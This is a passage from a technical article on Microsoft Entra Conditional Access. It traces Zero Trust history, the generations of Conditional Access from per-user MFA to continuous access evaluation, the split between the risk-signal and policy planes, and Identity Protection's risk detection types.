The session plane. CAE is an event-driven channel between Microsoft Entra and CAE-aware resource APIs (Exchange Online, SharePoint Online, Teams, Microsoft Graph). When a critical event fires -- account disabled, password reset, high user risk, network location change -- the resource API returns `HTTP 401` with a `WWW-Authenticate: Bearer error=&quot;insufficient_claims&quot;` challenge. The client replays the embedded claims to Entra and acquires a fresh token. In exchange for this channel, CAE tokens live up to 28 hours [@ms-cae-concept].
&lt;p&gt;Every component in this chain is individually documented on Microsoft Learn. The Conditional Access policy schema is on the Graph reference [@ms-graph-capolicy]. The &lt;code&gt;riskDetection&lt;/code&gt; resource is on the Graph reference too [@ms-graph-riskdetection]. The &lt;code&gt;cp1&lt;/code&gt; client capability is in the claims-challenge document [@ms-claims-challenge]. The &quot;up to 15 minutes&quot; propagation ceiling for CAE non-IP events is in the CAE concept document [@ms-cae-concept].&lt;/p&gt;
&lt;p&gt;But the chain is not assembled anywhere. That is what this article does.&lt;/p&gt;
&lt;p&gt;This article is for the architect or the detection engineer who already knows what a JWT is, what a service principal is, and what an MDM does. If you have ever stared at a Sign-in log entry that reads &quot;Conditional Access: Success&quot; and wondered what &lt;em&gt;exactly&lt;/em&gt; the policy engine concluded, this is for you.&lt;/p&gt;
&lt;p&gt;Three moments of insight are coming. First, why MFA without context fails not because MFA is weak but because the &lt;em&gt;unit&lt;/em&gt; is wrong (Section 3). Second, why the architectural breakthrough was a &lt;em&gt;separation&lt;/em&gt; and not a new algorithm (Section 5). Third, why the system has limits that no engineering will fix (Section 8).&lt;/p&gt;
&lt;p&gt;How did the industry end up with a token-issuance and claims-challenge model? The answer begins in 1975, with a paper that did not mention identity once.&lt;/p&gt;
&lt;h2&gt;2. From perimeter to identity boundary&lt;/h2&gt;
&lt;p&gt;In September 1975, Jerome Saltzer and Michael Schroeder published an eight-principle paper on operating-system protection that nobody at MIT thought of as a paper about cloud identity [@saltzer-schroeder-1975]. Half a century later, two of those eight -- &lt;em&gt;complete mediation&lt;/em&gt; and &lt;em&gt;least privilege&lt;/em&gt; -- are the implicit theorems every Conditional Access policy evaluates against. Where did the industry go in between?&lt;/p&gt;
&lt;h3&gt;Saltzer and Schroeder: the unstated theorems&lt;/h3&gt;
&lt;p&gt;Complete mediation says &quot;every access to every object must be checked for authority.&quot; Least privilege says &quot;every program and every user of the system should operate using the least set of privileges necessary to complete the job.&quot; These are stated as design &lt;em&gt;principles&lt;/em&gt;, not theorems. But they function as theorems for anyone building an access-control system: violate either of them and you have, by construction, a vulnerability. Conditional Access does not derive the principles. It re-states them as a JSON schema and a runtime evaluator.&lt;/p&gt;
&lt;h3&gt;Jericho Forum: the perimeter dissolves&lt;/h3&gt;
&lt;p&gt;In 2003, David Lacey of the Royal Mail and a loose affiliation of corporate CISOs began arguing, against the prevailing castle-and-moat consensus, that the corporate network perimeter could no longer be relied on as the trust boundary. The Jericho Forum formally launched under the Open Group umbrella in January 2004 [@wikipedia-jericho-forum]. They coined the term &quot;de-perimeterisation&quot; to describe what their member firms were already living: data and identity travelling outside the firewall faster than the firewall could be moved.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s own retrospective puts the quote precisely: the Jericho Forum &quot;promoted a new concept of security called de-perimeterisation that focused on how to protect enterprise data flowing in and out of your enterprise network boundary instead of striving to convince users and the business to keep it on the corporate network&quot; [@simos-2020-jericho]. The first sentence of Microsoft Learn&apos;s CA overview today is a direct descendant: &quot;modern security extends beyond an organization&apos;s network perimeter&quot; [@ms-ca-overview].&lt;/p&gt;
&lt;h3&gt;Kindervag: the name&lt;/h3&gt;
&lt;p&gt;John Kindervag, then a principal analyst at Forrester Research, gave the model its marketable name in a September 2010 report titled &quot;No More Chewy Centers: Introducing the Zero Trust Model of Information Security&quot; [@kindervag-2010-zero-trust]. Three tenets: all resources are accessed securely regardless of location; access control is on strict need-to-know and strictly enforced; all traffic is inspected and logged.&lt;/p&gt;
&lt;p&gt;The label stuck. Microsoft Learn now calls CA &quot;Microsoft&apos;s Zero Trust policy engine&quot; in its first sentence [@ms-ca-overview]. The lineage from Kindervag&apos;s 14-page Forrester report to that sentence is direct.&lt;/p&gt;
&lt;p&gt;The original Kindervag PDF is gated behind Forrester&apos;s paywall. The widely cited copy on &lt;code&gt;ndm.net&lt;/code&gt; redirects to an unrelated managed-IT-services company; the only reliably accessible mirror is the Wayback Machine snapshot. Treat the lineage as well documented and the URL as a curiosity of how academic ideas survive the open web.&lt;/p&gt;
&lt;h3&gt;BeyondCorp: the alternative&lt;/h3&gt;
&lt;p&gt;In December 2014, Rory Ward and Betsy Beyer published &quot;BeyondCorp: A New Approach to Enterprise Security&quot; in USENIX &lt;code&gt;;login:&lt;/code&gt; [@ward-beyer-2014-beyondcorp]. The paper described Google&apos;s internal Zero Trust deployment: every request authenticated and authorized by an access proxy, no implicit network trust, device inventory and user identity as the inputs to access decisions. A follow-up in 2016 documented the production rollout [@osborn-2016-beyondcorp].&lt;/p&gt;
&lt;p&gt;This is the architectural fork Section 7 returns to. BeyondCorp puts the policy engine in the data path, as a reverse proxy that sees every HTTP request. CA puts the policy engine at &lt;em&gt;token issuance&lt;/em&gt; and re-evaluates via &lt;em&gt;claims challenges&lt;/em&gt;. Both work. They are not interchangeable.&lt;/p&gt;
&lt;h3&gt;NIST SP 800-207: the vocabulary&lt;/h3&gt;
&lt;p&gt;In August 2020, NIST published Special Publication 800-207, &lt;em&gt;Zero Trust Architecture&lt;/em&gt; [@nist-sp-800-207-2020]. It codified the U.S. federal reference architecture: a Policy Engine that decides, a Policy Administrator that effects the decision, and a Policy Enforcement Point that intercepts the access.&lt;/p&gt;
&lt;p&gt;That trio is the vocabulary the Microsoft Learn CA documentation now uses. In the SP 800-207 mapping, Conditional Access is the Policy Engine and Policy Administrator; Exchange Online, SharePoint Online, Teams, and Microsoft Graph are the Policy Enforcement Points; Entra ID Protection is the trust algorithm that feeds the Policy Engine.&lt;/p&gt;

If you ever have to map Conditional Access to SP 800-207 for a compliance review, the cleanest correspondences are: PE = the CA evaluator inside Entra; PA = Entra&apos;s token issuer (because the decision is effected by issuing or refusing a token); PEP = the resource API (Exchange, SharePoint, Graph) that validates the token, plus, for CAE-aware resources, the same API enforcing claims-challenge revocation mid-session. ID Protection is the &quot;trust algorithm&quot; input to the PE.
&lt;p&gt;The doctrine was settled by 2020. But Microsoft had already been trying to build a perimeter on identity for six years, starting in 2014 with a much smaller idea.&lt;/p&gt;
&lt;h2&gt;3. Per-user MFA and the limits of binary controls&lt;/h2&gt;
&lt;p&gt;In 2014, Microsoft&apos;s only cloud-era access control was a per-user toggle that said &lt;em&gt;MFA: yes&lt;/em&gt; or &lt;em&gt;MFA: no&lt;/em&gt;. The toggle worked. It was a real improvement over passwords alone. It also produced the most exploited security failure of the next decade: MFA fatigue [@weinert-2023-managed-policies].&lt;/p&gt;
&lt;p&gt;How does a control improve security &lt;em&gt;and&lt;/em&gt; create a new attack class at the same time?&lt;/p&gt;
&lt;h3&gt;The per-user MFA state machine&lt;/h3&gt;
&lt;p&gt;Per-user MFA lives on the user object as a tri-state: &lt;code&gt;Disabled&lt;/code&gt;, &lt;code&gt;Enabled&lt;/code&gt;, or &lt;code&gt;Enforced&lt;/code&gt;. Microsoft Learn now says the quiet part out loud: &quot;The best way to protect users with Microsoft Entra MFA is to create a Conditional Access policy&quot; and &quot;Don&apos;t enable or enforce per-user Microsoft Entra multifactor authentication if you use Conditional Access policies&quot; [@ms-howto-mfa-userstates]. That guidance carries a generation of operational pain inside it. Mixing the two surfaces, in practice, produces unpredictable prompts: a CA policy says &quot;no MFA required for this location,&quot; the per-user state says &quot;always MFA,&quot; and the user gets prompted twice.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Microsoft&apos;s explicit guidance is to pick one surface. If you have Entra ID P1 or higher, use Conditional Access. The per-user state should remain &lt;code&gt;Disabled&lt;/code&gt; for those accounts. Mixed configurations produce both false-positive prompts and, occasionally, false-negative skips [@ms-howto-mfa-userstates].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Trusted IP rules: one-dimensional context&lt;/h3&gt;
&lt;p&gt;Office 365 added a second knob in the same era: &quot;trusted IPs.&quot; Sign-ins from a configured public IP range would skip the MFA challenge [@ms-ca-network]. The idea was that &quot;on the corporate network&quot; meant &quot;more trustworthy.&quot; This was reasonable in 2014. By 2017, it was already eroded by full-tunnel VPNs (every employee egresses through the corporate /16 from home), split-tunnel VPNs (some traffic does, some does not), and the realisation that &quot;corporate network&quot; had stopped being a useful synonym for &quot;trusted.&quot; Trusted IP is one-dimensional context, and one dimension was not enough.&lt;/p&gt;
&lt;h3&gt;Security Defaults: the Free-SKU descendant&lt;/h3&gt;
&lt;p&gt;Since 22 October 2019, every new Entra ID tenant has Security Defaults turned on by default at creation [@ms-security-defaults]. Security Defaults is a tenant-wide on/off switch that requires MFA for all admin roles, MFA for users when they show risk, blocks legacy authentication, and forces MFA registration. Microsoft&apos;s number on the impact is striking: &quot;more than 99.9% of those common identity-related attacks are stopped by using multifactor authentication and blocking legacy authentication&quot; [@ms-security-defaults].&lt;/p&gt;
&lt;p&gt;For Entra ID Free tenants in 2026, Security Defaults is still the only available baseline. There is no per-app policy, no per-risk gating, no Conditional Access. This is the licensing reality Section 10 returns to.&lt;/p&gt;
&lt;p&gt;Active Directory Federation Services -- AD FS -- is the on-prem federation product that ran the access-control story before any of this. It is still operational in many tenants. It is no longer Microsoft&apos;s strategic identity provider; the Microsoft Learn AD FS overview now opens with the explicit guidance &quot;Instead of upgrading to the latest version of AD FS, Microsoft highly recommends migrating to Microsoft Entra ID&quot; [@ms-ad-fs-overview]. AD FS claim rules functioned as a kind of policy engine, but they evaluated only at federation time and they had no concept of risk.&lt;/p&gt;
&lt;h3&gt;The four failure modes of the binary toggle&lt;/h3&gt;
&lt;p&gt;The first-generation controls -- per-user MFA, trusted IPs, Security Defaults -- share four documented limits:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;No expression of context.&lt;/strong&gt; The toggle is either on or off. It cannot say &quot;MFA from a new country but not from the office.&quot;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Trusted IP is thin context.&lt;/strong&gt; A public IP range is one bit of information; modern attacks include matching network egress.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;No per-app policy.&lt;/strong&gt; The toggle applies to all apps the user accesses. You cannot say &quot;MFA for the admin portal, not for Outlook.&quot;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;No exclusion semantics for break-glass accounts.&lt;/strong&gt; Emergency-access accounts need to be reachable when everything else has failed. The binary toggle either includes them or excludes them; it does not let you say &quot;exclude these accounts but log every sign-in as a high-priority alert.&quot;&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;MFA fatigue: when a control becomes a credential&lt;/h3&gt;
&lt;p&gt;The canonical failure of the binary toggle is push-bombing. The attacker has the password. The system requires MFA. The user gets four &quot;approve sign-in?&quot; notifications during a morning meeting. One gets a thumbs-up by reflex. The system did exactly what it was configured to do.&lt;/p&gt;
&lt;p&gt;The attack works because the control has no concept of &lt;em&gt;whether this is a normal sign-in&lt;/em&gt;. The same flow runs whether the request originates from the user&apos;s office WiFi or an anonymizing proxy in another country. The MFA challenge carries no risk-weighted information; the user has no signal that this prompt is different from yesterday&apos;s prompt. Fatigue is the consequence. Microsoft&apos;s own Entra blog catalogued the attack pattern and the operational mitigations in the wake of the 2022 incident cluster [@ms-techcom-mfa-fatigue].&lt;/p&gt;

Focusing on password rules, rather than things that can really help -- like multi-factor authentication (MFA), or great threat detection -- is just a distraction. -- Alex Weinert, Microsoft Identity, July 2019 [@weinert-2019-password]
&lt;p&gt;Weinert&apos;s 2019 piece is now infamous in the identity community for its title alone -- &quot;Your Pa$$word doesn&apos;t matter.&quot; The argument was that a password&apos;s composition rules carry no information that helps the system tell a real user from an attacker; what does carry information is &lt;em&gt;context&lt;/em&gt;. The system needed a place to put that context.&lt;/p&gt;
&lt;p&gt;If &lt;em&gt;MFA yes/no&lt;/em&gt; cannot express context, the next step is obvious: make context the input. But to make context the input, the system needs a place to &lt;em&gt;put&lt;/em&gt; it. The history of CA from 2015 forward is the history of giving context a home.&lt;/p&gt;
&lt;h2&gt;4. Generation by generation&lt;/h2&gt;
&lt;p&gt;The next eight years produced six generations of access control, each one closing a specific failure of the previous one. They look like product launches in a marketing chronology. They are something more interesting: a sequence of negative results, each followed by a positive engineering response.&lt;/p&gt;

timeline
    title Conditional Access timeline
    2014 : Gen 1 per-user MFA and trusted IPs
    2015 : CA enters public preview
    2016 : Gen 2 Conditional Access general availability
    2016 : ID Protection enters preview
    2018 : Gen 3 risk-based CA conditions broadly available
    2020 : CAE enters preview
    2022 : Gen 4 Continuous Access Evaluation general availability
    2023 : Gen 5 CA for workload identities
    2023 : Gen 6 Microsoft-managed policies and Authentication Strengths
    2026 : CA for AI agent identities
&lt;p&gt;The 2026 milestone -- Conditional Access for AI agent identities -- is itself still emerging; Microsoft&apos;s current framing in the Conditional Access Optimization Agent announcement names it explicitly as a frontier rather than a finished generation [@ms-techcom-ca-optimization-agent]. Section 9.1 returns to the open problems.&lt;/p&gt;
&lt;h3&gt;Gen 1 (2014 to 2016): per-user MFA&lt;/h3&gt;
&lt;p&gt;Documented in Section 3. The control has no concept of context. The failure motivates Gen 2.&lt;/p&gt;
&lt;h3&gt;Gen 2 (September 2016 GA): Conditional Access with static rules&lt;/h3&gt;
&lt;p&gt;The September 27, 2016 CloudBlogs post announcing CA general availability framed it as &quot;Protect your data at the front door&quot; -- the &quot;front door&quot; framing that Microsoft documentation still uses [@ms-techcom-ca-frontdoor-2016]. The policy schema (users + cloud apps + conditions to grants) was introduced in the 2015 preview [@ms-techcom-ca-preview-2015] and survived essentially unchanged into 2016 GA.&lt;/p&gt;
&lt;p&gt;Gen 2 closed Gen 1&apos;s failure mode: context now had a home. A policy could match on network location, on the app being accessed, on the user&apos;s group membership, on the device platform. It could express &quot;block country X&quot; or &quot;require MFA when not on the corporate network.&quot;&lt;/p&gt;
&lt;p&gt;The remaining documented limit: no risk feed. The engine could express &lt;em&gt;what to check for&lt;/em&gt; but not &lt;em&gt;whether this specific sign-in looks suspicious&lt;/em&gt;. A policy could block credential-stuffing attempts only if you happened to know in advance which IPs to deny. Motivated Gen 3.&lt;/p&gt;
&lt;h3&gt;Gen 3 (2017 to 2018): risk-based fusion&lt;/h3&gt;
&lt;p&gt;Identity Protection had been generating risk signals since its March 2016 preview. Through 2017 and 2018, two new condition keys appeared in the CA policy schema: &lt;code&gt;signInRiskLevels&lt;/code&gt; and &lt;code&gt;userRiskLevels&lt;/code&gt;. Both take values from the set &lt;code&gt;low&lt;/code&gt;, &lt;code&gt;medium&lt;/code&gt;, &lt;code&gt;high&lt;/code&gt;. The risk feed plugged into the policy plane through exactly two keys. The legacy ID-Protection-side risk policies (which were a parallel policy surface inside ID Protection itself) are now retiring on 1 October 2026; the canonical surface is CA [@ms-id-protection-policies].&lt;/p&gt;
&lt;p&gt;The remaining limit: pre-issuance only. The CA evaluator runs at sign-in time. Once a token is issued, the policy plane has no way to undo the decision until the token expires. Microsoft&apos;s own retrospective is honest about what they tried first: &quot;Microsoft experimented with the &apos;blunt object&apos; approach of reduced token lifetimes but found they degrade user experiences and reliability without eliminating risks&quot; [@ms-cae-concept]. A one-hour token cuts the worst-case revocation latency to an hour, but it also means a user with intermittent connectivity gets prompted every hour, and a mobile app with retry storms can hammer the IdP. The trade-off was unacceptable. Motivated Gen 4.&lt;/p&gt;
&lt;h3&gt;Gen 4 (January 2022 GA): Continuous Access Evaluation&lt;/h3&gt;
&lt;p&gt;CAE inverted the trade-off. Instead of shortening the token, lengthen it -- up to 28 hours [@ms-cae-concept]. Then add a side channel: when a critical event fires (account disabled, password reset, high user risk, IP location change), the resource API issues an &lt;code&gt;HTTP 401&lt;/code&gt; with a &lt;code&gt;WWW-Authenticate&lt;/code&gt; claims challenge, and the client replays to Entra for a fresh token. Latency on the side channel is bounded: &quot;up to 15 minutes&quot; for non-IP events, &quot;instant&quot; for IP locations [@ms-cae-concept]. CAE was tied to an emerging open standard from day one, the OpenID Continuous Access Evaluation Profile [@ms-cae-concept]. The general-availability announcement landed on 10 January 2022 [@ms-techcom-cae-ga-2022].&lt;/p&gt;
&lt;p&gt;Remaining limit: applies to humans only. Service principals do not consume CAE-aware client libraries; they cannot perform a claims challenge. Motivated Gen 5.&lt;/p&gt;
&lt;h3&gt;Gen 5 (2023 GA): Conditional Access for workload identities&lt;/h3&gt;
&lt;p&gt;Same engine, constrained grant set. The Microsoft Learn page is blunt on the boundaries: &quot;Workload Identities Premium licenses are required&quot; and the constraint set is unusual -- &quot;Policy can be applied to single tenant service principals that are registered in your tenant. Microsoft and third-party SaaS applications, including multitenant apps, are not covered by these policies. Managed identities aren&apos;t covered by policy&quot; and &quot;Under Grant, Block access is the only available option&quot; [@ms-workload-identity-ca]. The public preview of CA filters for workload identities opened on 26 October 2022 [@vansurksum-2022-workload-ca]; the Microsoft Entra Workload Identities standalone product followed in late November 2022, and the Conditional Access feature for workload identities itself reached general availability later in 2023.&lt;/p&gt;
&lt;p&gt;The single-tenant restriction is a structural choice. Multi-tenant SaaS apps appear in many tenants&apos; service principal directories at once; policy scoping on them would require a cross-tenant resolution protocol the engine does not have. Managed identities are excluded because they belong to Azure subscriptions, not to user identity, and Microsoft has chosen not to extend the surface there. Group assignments do not work either: &quot;Conditional Access policies assigned to a group that contains a service principal are not enforced for that service principal&quot; [@ms-workload-identity-ca].&lt;/p&gt;
&lt;p&gt;Remaining limit: under-configured in most tenants because the grant taxonomy is so narrow that admins do not see immediate value. Motivated Gen 6.&lt;/p&gt;
&lt;h3&gt;Gen 6 (November 2023 onwards): Microsoft-managed policies and Authentication Strengths&lt;/h3&gt;
&lt;p&gt;In November 2023, Alex Weinert announced Microsoft-managed Conditional Access policies: a set of baselines that Microsoft would auto-deploy into tenants in Report-only mode and then auto-enable after a waiting period [@weinert-2023-managed-policies]. The launch announcement specified a 90-day window [@helpnet-2023-microsoft-entra-policies]. The current Microsoft Learn documentation specifies &quot;Microsoft enables these policies no less than 45 days after they&apos;re introduced in your tenant if they&apos;re left in the Report-only state&quot; with a 28-day pre-enablement notification [@ms-managed-policies].&lt;/p&gt;
&lt;p&gt;The window shrank deliberately. The 90-day window in the 2023 launch announcement was a calibration window; the 45-day window in current documentation is the post-calibration setting. Both numbers are correct in their respective time frames. The article uses the current number throughout.&lt;/p&gt;
&lt;p&gt;Parallel to the managed policies, Microsoft shipped &lt;em&gt;Authentication Strengths&lt;/em&gt; -- a named bundle of acceptable authentication methods that can be required as a grant. The three built-in strengths are &lt;em&gt;MFA strength&lt;/em&gt;, &lt;em&gt;Passwordless MFA strength&lt;/em&gt;, and &lt;em&gt;Phishing-resistant MFA strength&lt;/em&gt; (FIDO2 security key, &lt;a href=&quot;https://paragmali.com/blog/your-face-is-not-your-password-inside-windows-hellos-hardwar/&quot; rel=&quot;noopener&quot;&gt;Windows Hello for Business&lt;/a&gt;, multifactor certificate-based authentication) [@ms-auth-strengths]. The phishing-resistant strength is the modern way to express &quot;no adversary-in-the-middle phishing kit should be able to defeat this grant.&quot;&lt;/p&gt;
&lt;h3&gt;The pattern: extension, not replacement&lt;/h3&gt;
&lt;p&gt;From Gen 3 onward, each generation &lt;em&gt;extends&lt;/em&gt; the prior schema rather than replacing it. The &lt;code&gt;conditionalAccessPolicy&lt;/code&gt; JSON shape that shipped in 2016 still drives the engine in 2026 -- with new condition keys added, new grant types added, new session controls added. By the standards of cloud control surfaces, that is a long run without a rewrite.&lt;/p&gt;
&lt;p&gt;The reason is the architectural decision the next section is about.&lt;/p&gt;
&lt;h2&gt;5. The two-plane separation&lt;/h2&gt;
&lt;p&gt;The breakthrough is not a model, not a token format, not a wire protocol. It is a &lt;em&gt;separation&lt;/em&gt;: the &lt;strong&gt;signal plane&lt;/strong&gt; that produces risk detections from the &lt;strong&gt;policy plane&lt;/strong&gt; that consumes them.&lt;/p&gt;
&lt;p&gt;Stated like that, it sounds banal. Read it the other direction -- a policy engine whose risk model can change without changing the policy semantics, and whose policy can change without retraining the model -- and it is the design that makes the system maintainable at trillions of daily signals across hundreds of thousands of tenants.&lt;/p&gt;
&lt;h3&gt;The two planes, precisely&lt;/h3&gt;
&lt;p&gt;The signal plane is Microsoft Entra ID Protection. It runs detection logic on every interactive sign-in (and, for offline detections, on historical sign-ins) and emits a &lt;code&gt;riskDetection&lt;/code&gt; resource into a per-tenant log on Microsoft Graph at &lt;code&gt;/identityProtection/riskDetections&lt;/code&gt;. Each detection carries five fields you care about: &lt;code&gt;riskEventType&lt;/code&gt; (one of about two dozen named detection types like &lt;code&gt;anonymizedIPAddress&lt;/code&gt;, &lt;code&gt;leakedCredentials&lt;/code&gt;, &lt;code&gt;unlikelyTravel&lt;/code&gt;), &lt;code&gt;riskLevel&lt;/code&gt; (&lt;code&gt;low&lt;/code&gt;, &lt;code&gt;medium&lt;/code&gt;, &lt;code&gt;high&lt;/code&gt;, plus the bookkeeping values &lt;code&gt;hidden&lt;/code&gt; and &lt;code&gt;none&lt;/code&gt;), &lt;code&gt;riskState&lt;/code&gt; (&lt;code&gt;atRisk&lt;/code&gt;, &lt;code&gt;confirmedCompromised&lt;/code&gt;, &lt;code&gt;dismissed&lt;/code&gt;, &lt;code&gt;remediated&lt;/code&gt;), &lt;code&gt;detectionTimingType&lt;/code&gt; (&lt;code&gt;realtime&lt;/code&gt;, &lt;code&gt;nearRealtime&lt;/code&gt;, &lt;code&gt;offline&lt;/code&gt;), and &lt;code&gt;additionalInfo&lt;/code&gt; (a JSON blob with user-agent, IP, alert URL, reason codes) [@ms-graph-riskdetection][@ms-id-protection-risks].&lt;/p&gt;
&lt;p&gt;The policy plane is Conditional Access. It is a JSON object at &lt;code&gt;/identity/conditionalAccess/policies/{id}&lt;/code&gt; on the Graph API [@ms-graph-capolicy]. Each policy has &lt;code&gt;displayName&lt;/code&gt;, &lt;code&gt;state&lt;/code&gt; (&lt;code&gt;enabled&lt;/code&gt;, &lt;code&gt;disabled&lt;/code&gt;, &lt;code&gt;enabledForReportingButNotEnforced&lt;/code&gt;), &lt;code&gt;conditions&lt;/code&gt;, &lt;code&gt;grantControls&lt;/code&gt;, and &lt;code&gt;sessionControls&lt;/code&gt;. The conditions block contains the per-policy targeting: which users, which apps, which platforms, which network locations -- and two condition keys named &lt;code&gt;signInRiskLevels&lt;/code&gt; and &lt;code&gt;userRiskLevels&lt;/code&gt;.&lt;/p&gt;

**Sign-in risk** is a per-sign-in probability that the credential being used is being used by someone other than the legitimate owner *at this moment*. **User risk** is a per-user probability that the account itself has been compromised over its recent history. A user with leaked credentials in a breach corpus carries persistent user risk until the password is reset; a user signing in from an anonymizing proxy carries sign-in risk for that session. CA policies can match on either, both, or neither. Risk-based conditions require Entra ID P2 [@ms-id-protection-policies].
&lt;p&gt;Those two condition keys -- &lt;code&gt;signInRiskLevels&lt;/code&gt; and &lt;code&gt;userRiskLevels&lt;/code&gt; -- are the entire API surface between the signal plane and the policy plane. Everything else about ID Protection is hidden behind them. The policy plane does not know whether &lt;code&gt;high&lt;/code&gt; came from a transformer or a logistic regression or a hardcoded rule. The signal plane does not know which policies will read its output. The contract is two strings.&lt;/p&gt;

flowchart LR
    subgraph SP[Signal plane Entra ID Protection]
        DET[Detection pipeline]
        RD[(riskDetection log)]
        RL[Risk level low medium high]
    end
    subgraph PP[Policy plane Conditional Access]
        EV[Policy evaluator]
        POL[(conditionalAccessPolicy JSON)]
        TOK[Token issuer]
    end
    subgraph SES[Session plane CAE]
        CH[Critical event channel]
        RP[Resource API]
    end
    DET --&amp;gt; RD
    DET --&amp;gt; RL
    RL -. signInRiskLevels userRiskLevels .-&amp;gt; EV
    POL --&amp;gt; EV
    EV --&amp;gt; TOK
    TOK -- access token --&amp;gt; RP
    DET -. user risk events .-&amp;gt; CH
    CH -. 401 insufficient claims .-&amp;gt; RP
&lt;h3&gt;Why the separation matters&lt;/h3&gt;
&lt;p&gt;Three concrete consequences fall out of the design:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The risk model is re-trainable without policy rewrites.&lt;/strong&gt; Microsoft&apos;s ID Protection team can change the underlying detection algorithm tomorrow. Add a new &lt;code&gt;riskEventType&lt;/code&gt;. Replace the classifier for &lt;code&gt;unlikelyTravel&lt;/code&gt;. Re-tune the threshold that maps a score to &lt;code&gt;low&lt;/code&gt;/&lt;code&gt;medium&lt;/code&gt;/&lt;code&gt;high&lt;/code&gt;. None of these require tenants to rewrite their CA policies, because policies match on the &lt;em&gt;level&lt;/em&gt;, not the &lt;em&gt;signal&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Tenants without the licence simply do not use the risk conditions.&lt;/strong&gt; An Entra ID P1 tenant can deploy CA policies that match on users, apps, locations, devices, client apps, and platforms. P2 unlocks the risk conditions. The schema accommodates both: P1 policies just leave the risk arrays empty. There is no parallel policy surface for the non-risk-aware tenants; they use the same engine.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;CAE is a third plane layered onto the same skeleton.&lt;/strong&gt; Continuous Access Evaluation did not require redesign of the policy plane. The CAE channel is a new &lt;em&gt;event delivery&lt;/em&gt; mechanism; the events it propagates are things the signal plane already knew about (high user risk, password reset, account disabled) plus new ones the policy plane introduced (network-location-policy changed). The architecture absorbed CAE because the design was already a separation of concerns.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The signal plane and the policy plane are separable; the contract between them is &lt;em&gt;two condition keys&lt;/em&gt; (&lt;code&gt;signInRiskLevels&lt;/code&gt; and &lt;code&gt;userRiskLevels&lt;/code&gt;). That is what makes the system maintainable across a decade of evolution.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;The &quot;pit of success&quot; framing&lt;/h3&gt;
&lt;p&gt;Alex Weinert calls this the &quot;pit of success.&quot; His November 2023 piece on Microsoft-managed policies put the metric on it: a decade ago Microsoft turned on a &quot;radical&quot; tenant-wide policy requiring MFA for every consumer Microsoft account, and &quot;today, 100 percent of consumer Microsoft accounts older than 60 days have multifactor authentication&quot; [@weinert-2023-managed-policies].&lt;/p&gt;
&lt;p&gt;The 100 percent number is achievable because the policy plane and the signal plane can each evolve independently. Microsoft can ship a managed policy that says &quot;require MFA for high-risk sign-ins&quot; without committing to a fixed definition of &quot;high risk.&quot; The definition lives on the signal plane and changes weekly. The policy lives on the policy plane and is stable for years.&lt;/p&gt;
&lt;p&gt;With the separation as the spine, the next section walks the end-to-end pipeline in one continuous trace, from signal to grant to token to session, on a real sign-in -- the trace no public Microsoft document assembles in one place.&lt;/p&gt;
&lt;h2&gt;6. The end-to-end pipeline&lt;/h2&gt;
&lt;p&gt;Take Alice&apos;s Tuesday morning from Section 1 and walk it forward. This section has six subsections. By the end of them, the question &quot;who decided?&quot; has six independently sourced answers and one combined picture.&lt;/p&gt;
&lt;h3&gt;6.1 What the signal plane sees&lt;/h3&gt;
&lt;p&gt;Identity Protection&apos;s detection taxonomy splits into five rough groups, based on what kind of information triggered the detection. The canonical taxonomy is the Microsoft Learn page on risk types [@ms-id-protection-risks]; the wire-format enum on the Graph schema is at [@ms-graph-riskdetection].&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;em&gt;Network signals.&lt;/em&gt; &lt;code&gt;anonymizedIPAddress&lt;/code&gt;, &lt;code&gt;maliciousIPAddress&lt;/code&gt;, &lt;code&gt;nationStateIP&lt;/code&gt;, &lt;code&gt;riskyIPAddress&lt;/code&gt;. The signal is the source IP and reputation databases that ID Protection ingests.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Behavioural signals.&lt;/em&gt; &lt;code&gt;unlikelyTravel&lt;/code&gt;, &lt;code&gt;mcasImpossibleTravel&lt;/code&gt;, &lt;code&gt;newCountry&lt;/code&gt;, &lt;code&gt;unfamiliarFeatures&lt;/code&gt;, &lt;code&gt;anomalousUserActivity&lt;/code&gt;. The signal is a deviation from the tenant&apos;s or the user&apos;s historical baseline.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Credential signals.&lt;/em&gt; &lt;code&gt;leakedCredentials&lt;/code&gt;, &lt;code&gt;passwordSpray&lt;/code&gt;. The signal is a match against a corpus of breached credentials or a velocity-based pattern across tenants.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Token and session signals.&lt;/em&gt; &lt;code&gt;anomalousToken&lt;/code&gt;, &lt;code&gt;tokenIssuerAnomaly&lt;/code&gt;, &lt;code&gt;attemptedPrtAccess&lt;/code&gt;, &lt;code&gt;attackerinTheMiddle&lt;/code&gt;, &lt;code&gt;authenticatorPhishing&lt;/code&gt;. The signal is on the token itself or on the way the authenticator flow ran.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Inbox behaviour.&lt;/em&gt; &lt;code&gt;suspiciousInboxForwarding&lt;/code&gt;, &lt;code&gt;mcasSuspiciousInboxManipulationRules&lt;/code&gt;. The signal is on what happened &lt;em&gt;after&lt;/em&gt; the sign-in -- a post-compromise indicator that retroactively flags the sign-in that enabled it.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each detection is also tagged with a timing: real-time, near-real-time, or offline. Microsoft Learn is precise about the latencies: &quot;Detections triggered in real-time take 5-10 minutes to surface details in the reports. Offline detections take up to 48 hours&quot; [@ms-risk-detection-types].&lt;/p&gt;
